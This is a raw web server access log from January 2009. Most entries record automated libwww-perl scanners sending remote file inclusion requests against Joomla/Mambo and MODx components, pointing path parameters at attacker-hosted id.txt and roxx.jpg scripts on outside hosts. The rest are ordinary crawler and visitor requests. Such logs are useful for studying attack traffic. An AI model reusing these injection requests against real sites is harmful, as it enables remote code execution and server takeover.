66.152.162.116 - - [30/Jan/2009:10:00:16 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95169 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:00:16 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:00:16 -0800] "GET /logs/access_080620.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:00:26 -0800] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:00:26 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:00:26 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.21.71.133 - - [30/Jan/2009:10:00:27 -0800] "GET /logs/access_080614.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [30/Jan/2009:10:00:28 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [30/Jan/2009:10:00:28 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:10:00:39 -0800] "GET /bikes/dteel/CreSTOC08/?N=A HTTP/1.0" 200 6009 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:00:40 -0800] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:00:41 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95146 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:00:42 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:00:52 -0800] "GET /logs/access_080711.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:00:55 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:00:56 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95230 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:00:56 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:01:07 -0800] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:01:08 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95121 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:01:10 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:01:10 -0800] "GET /logs/access_080620.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:01:14 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:01:16 -0800] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:01:17 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:01:17 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:10:01:34 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:10:01:34 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:10:01:34 -0800] "GET /logs/access_080618.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:01:39 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:01:40 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95246 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:01:41 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:01:54 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:09 -0800] "GET /logs/access_080207.log/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:09 -0800] "GET /config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:11 -0800] "GET /logs/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:13 -0800] "GET /logs/access_080207.log/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:14 -0800] "GET /config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.21.71.133 - - [30/Jan/2009:10:02:15 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:15 -0800] "GET /logs/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.21.71.133 - - [30/Jan/2009:10:02:15 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
84.21.71.133 - - [30/Jan/2009:10:02:15 -0800] "GET /logs/access_080614.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:02:15 -0800] "GET /logs/access_080818.log HTTP/1.1" 200 3223660 "http://tw.search.yahoo.com/search?p=http%3A%2F%2Fb.*****%2F%3F89913-1.html&y=%E6%90%9C%E5%B0%8B&fr=yfp&ei=UTF-8&rd=r1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:02:22 -0800] "GET /logs/access_081129.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:24 -0800] "GET /logs/access_080207.log/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:24 -0800] "GET /config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:26 -0800] "GET /logs/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:02:57 -0800] "GET /logs/access_080928.log/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:03:00 -0800] "GET /logs/access_080928.log/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:10:03:09 -0800] "GET /logs/access_080928.log/config.php?path_to_root=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.163.172.44 - - [30/Jan/2009:10:03:20 -0800] "HEAD / HTTP/1.1" 200 0 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2F&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "www.dmulk.com"
66.163.172.44 - - [30/Jan/2009:10:03:20 -0800] "GET / HTTP/1.1" 200 94219 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2F&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1) (via babelfish.yahoo.com)" "www.dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:26 -0800] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:27 -0800] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:28 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:28 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:30 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:30 -0800] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:31 -0800] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:31 -0800] "GET /blog/wp-content/gallery/worldrider-2008/1008081252.jpg HTTP/1.1" 200 482728 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:31 -0800] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:32 -0800] "GET /blog/wp-content/gallery/worldrider-2008/1008081327.jpg HTTP/1.1" 200 422678 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:39 -0800] "GET /blog/wp-content/gallery/worldrider-2008/1008081317.jpg HTTP/1.1" 200 411009 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:39 -0800] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:40 -0800] "GET /blog/wp-content/gallery/2008-26-09-tag/001.jpg HTTP/1.1" 200 574287 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:43 -0800] "GET /blog/wp-content/gallery/2008-26-09-tag/011.jpg HTTP/1.1" 200 498160 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:47 -0800] "GET /blog/wp-content/gallery/2008-26-09-tag/003.jpg HTTP/1.1" 200 468643 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:03:50 -0800] "GET /logs/access_081129.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:50 -0800] "GET /blog/wp-content/gallery/2008-26-09-tag/005.jpg HTTP/1.1" 200 431036 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:55 -0800] "GET /blog/wp-content/gallery/2008-26-09-tag/008.jpg HTTP/1.1" 200 375789 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:03:55 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:03:55 -0800] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:03:55 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:56 -0800] "GET /blog/wp-content/gallery/2008-26-09-tag/013.jpg HTTP/1.1" 200 480085 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:03:57 -0800] "GET /logs/access_080528.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:03:59 -0800] "GET /blog/wp-content/gallery/2008-26-09-tag/014b.jpg HTTP/1.1" 200 373029 "http://66.163.168.225/babelfish/translate_url_content?.intl=tw&lp=en_zt&trurl=http%3A%2F%2Fwww.dmulk.com%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:04:02 -0800] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2F&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "dmulk.com"
193.140.245.7 - - [30/Jan/2009:10:04:08 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.66.130.16 - - [30/Jan/2009:10:04:09 -0800] "GET /logs/access_080124.log HTTP/1.1" 200 713220 "http://tw.search.yahoo.com/search?p=www.dmulk.com&y=%E6%90%9C%E5%B0%8B&fr=yfp&ei=UTF-8&rd=r1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "www.dmulk.com"
66.163.172.45 - - [30/Jan/2009:10:04:14 -0800] "HEAD /logs/access_080124.log HTTP/1.1" 200 0 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080124.log&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "www.dmulk.com"
66.163.172.44 - - [30/Jan/2009:10:04:14 -0800] "GET /logs/access_080124.log HTTP/1.1" 200 713220 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080124.log&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1) (via babelfish.yahoo.com)" "www.dmulk.com"
193.140.245.7 - - [30/Jan/2009:10:04:23 -0800] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.140.245.7 - - [30/Jan/2009:10:04:23 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.140.245.7 - - [30/Jan/2009:10:04:24 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.163.172.45 - - [30/Jan/2009:10:04:35 -0800] "HEAD /logs/access_080516.log HTTP/1.1" 200 0 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080516.log&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "www.dmulk.com"
66.163.172.45 - - [30/Jan/2009:10:04:35 -0800] "GET /logs/access_080516.log HTTP/1.1" 200 3546821 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080516.log&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1) (via babelfish.yahoo.com)" "www.dmulk.com"
66.163.172.45 - - [30/Jan/2009:10:04:53 -0800] "HEAD /logs/access_080211.log HTTP/1.1" 200 0 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080211.log&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1)" "www.dmulk.com"
66.163.172.44 - - [30/Jan/2009:10:04:54 -0800] "GET /logs/access_080211.log HTTP/1.1" 200 1095122 "http://tw.babelfish.yahoo.com/translate_url?doit=done&tt=url&trurl=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080211.log&lp=en_zt&.intl=tw&fr=yfp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; Foxy/1) (via babelfish.yahoo.com)" "www.dmulk.com"
193.140.245.7 - - [30/Jan/2009:10:05:17 -0800] "GET /logs/access_080808.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:06:37 -0800] "GET /logs/access_080905.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:06:38 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95213 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:06:38 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:06:55 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:06:55 -0800] "GET /logs/access_080529.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
